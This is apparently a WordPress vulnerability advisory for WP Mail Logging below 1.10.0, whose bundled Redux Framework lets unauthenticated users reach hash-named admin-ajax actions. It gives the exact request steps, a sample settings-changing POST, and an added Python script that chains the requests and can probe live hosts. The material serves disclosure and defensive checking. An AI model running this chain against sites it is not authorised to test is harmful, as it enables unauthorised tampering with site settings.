wpexploit / Rotem Reiss / WPEX-ID: 66616623-0C80-4B95-A8DE-5D7F8C6A57B3
History: Nov 29, 2021 - 12:00 a.m.

WP Mail Logging < 1.10.0 - Outdated Redux Framework

2021-11-29 00:00:00
Rotem Reiss

5.3 Medium (CVSS3)
  Attack Vector: NETWORK
  Attack Complexity: LOW
  Privileges Required: NONE
  User Interaction: NONE
  Scope: UNCHANGED
  Confidentiality Impact: LOW
  Integrity Impact: NONE
  Availability Impact: NONE
  Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

5 Medium (CVSS2)
  Access Vector: NETWORK
  Access Complexity: LOW
  Authentication: NONE
  Confidentiality Impact: PARTIAL
  Integrity Impact: NONE
  Availability Impact: NONE
  Vector: AV:N/AC:L/Au:N/C:P/I:N/A:N

The plugin bundles an outdated version of the Redux Framework, which is known to be affected by security issues (CVE-2021-38312 and CVE-2021-38314). Through CVE-2021-38314, unauthenticated attackers could change some of the Framework's settings.

The first endpoint's action name is derived from the website's URL (e.g., https://www.wordpress.com/) md5-hashed with the "-redux" suffix.

For example, for the above URL, the first endpoint will be: https://www.wordpress.com/wp-admin/admin-ajax.php?action=16a8ca2d7a9690742c2048ec7b7f0f56

A simple HTTP GET request to the first action returns the hash that forms the first part of the second hash, which is needed to trigger the "support_args" method.

Take the hash returned by the first endpoint and md5-hash it with the "-support" suffix. The resulting action name can then be used to modify some of the Framework's settings (for example, disabling tracking via the redux_framework_disable_tracking parameter).

For example: POST /wp-admin/admin-ajax.php?action=30cf1a163dd8a8787885585aee1e1973&redux_framework_disable_tracking=tru

Note that the other parameters this endpoint accepts in the URL (e.g., hash, i, and code) are also known in advance to malicious actors.
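The two-step derivation above (site URL + "-redux", then leaked hash + "-support") as an added example; this is my code, not the advisory's and not the Redux Framework's. It chains the two admin-ajax requests through an injectable fetch function and runs against a constructed stand-in responder so nothing is contacted over the network. The reply format of the first endpoint, the stand-in hash value, the trailing-slash handling of the site URL and the `reachable` heuristic (admin-ajax.php answers `0` when no handler is registered for a nopriv action) are assumptions of this example; the urllib transport is only used if you pass it in yourself.

```python
import hashlib
import json
import re
from typing import Callable, Optional
from urllib.parse import urlencode
from urllib.request import Request, urlopen

HEX32 = re.compile(r"[0-9a-f]{32}")


def first_action(site_url: str) -> str:
    """Action name of the first endpoint: md5(site URL + '-redux').

    The advisory hashes the URL exactly as written (trailing slash included),
    so no normalisation is applied here; a different spelling of the URL
    yields a different action name.
    """
    return hashlib.md5((site_url + "-redux").encode()).hexdigest()


def support_action(leaked_hash: str) -> str:
    """Action name wired to support_args(): md5(leaked hash + '-support')."""
    return hashlib.md5((leaked_hash + "-support").encode()).hexdigest()


def extract_hash(body: str) -> Optional[str]:
    """Pull the 32-hex hash out of the first endpoint's reply.

    ASSUMPTION: the advisory does not show the reply format, so this accepts
    either JSON with a 'hash' member or any bare 32-hex token in the body.
    """
    try:
        data = json.loads(body)
        if isinstance(data, dict) and HEX32.fullmatch(str(data.get("hash", ""))):
            return data["hash"]
    except ValueError:
        pass
    match = HEX32.search(body)
    return match.group(0) if match else None


# (method, url, form fields) -> response body
Fetch = Callable[[str, str, Optional[dict]], str]


def urllib_fetch(method: str, url: str, params: Optional[dict] = None) -> str:
    """Real transport; only used when a caller passes it to probe()."""
    data = urlencode(params).encode() if params else None
    req = Request(url, data=data, method=method, headers={"User-Agent": "redux-probe"})
    with urlopen(req, timeout=10) as resp:
        return resp.read().decode("utf-8", "replace")


def probe(site_url: str, fetch: Fetch) -> dict:
    """Chain the two requests from the advisory without changing any setting.

    ASSUMPTION: admin-ajax.php replies '0' when no handler is registered for
    a nopriv action, so any other reply from the support action means an
    unauthenticated caller reaches support_args().
    """
    base = site_url.rstrip("/") + "/wp-admin/admin-ajax.php"
    a1 = first_action(site_url)
    leaked = extract_hash(fetch("GET", f"{base}?action={a1}", None))
    result = {"first_action": a1, "leaked_hash": leaked, "support_action": None, "reachable": False}
    if leaked is None:
        return result
    a2 = support_action(leaked)
    result["support_action"] = a2
    # Deliberately no redux_framework_disable_tracking parameter: reachability only.
    reply = fetch("POST", f"{base}?action={a2}", {})
    result["reachable"] = reply.strip() not in ("", "0", "-1")
    return result


# --- Constructed stand-in responders (no real site is contacted) ---
SITE = "https://www.wordpress.com/"
FAKE_LEAKED_HASH = "0123456789abcdef0123456789abcdef"  # constructed sample value


def vulnerable_site(method: str, url: str, params: Optional[dict]) -> str:
    """Both hash-named nopriv actions are registered, as on an outdated Redux."""
    if method == "GET" and f"action={first_action(SITE)}" in url:
        return json.dumps({"hash": FAKE_LEAKED_HASH})
    if method == "POST" and f"action={support_action(FAKE_LEAKED_HASH)}" in url:
        return json.dumps({"status": "ok"})
    return "0"


def patched_site(method: str, url: str, params: Optional[dict]) -> str:
    """Neither action is exposed to unauthenticated callers."""
    return "0"


if __name__ == "__main__":
    print("first action for", SITE, "=", first_action(SITE))
    print("vulnerable:", probe(SITE, vulnerable_site))
    print("patched:", probe(SITE, patched_site))
```

Running the script prints the first action name for the advisory's example URL so it can be compared against the value quoted above; to test a real host, call `probe(url, urllib_fetch)`. The probe never sends a setting-changing parameter, so it can be used as a non-destructive check for the outdated Redux component.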

Impact: An unauthenticated attacker can change the plugin's settings and possibly make it disclose other sensitive information about the plugin.
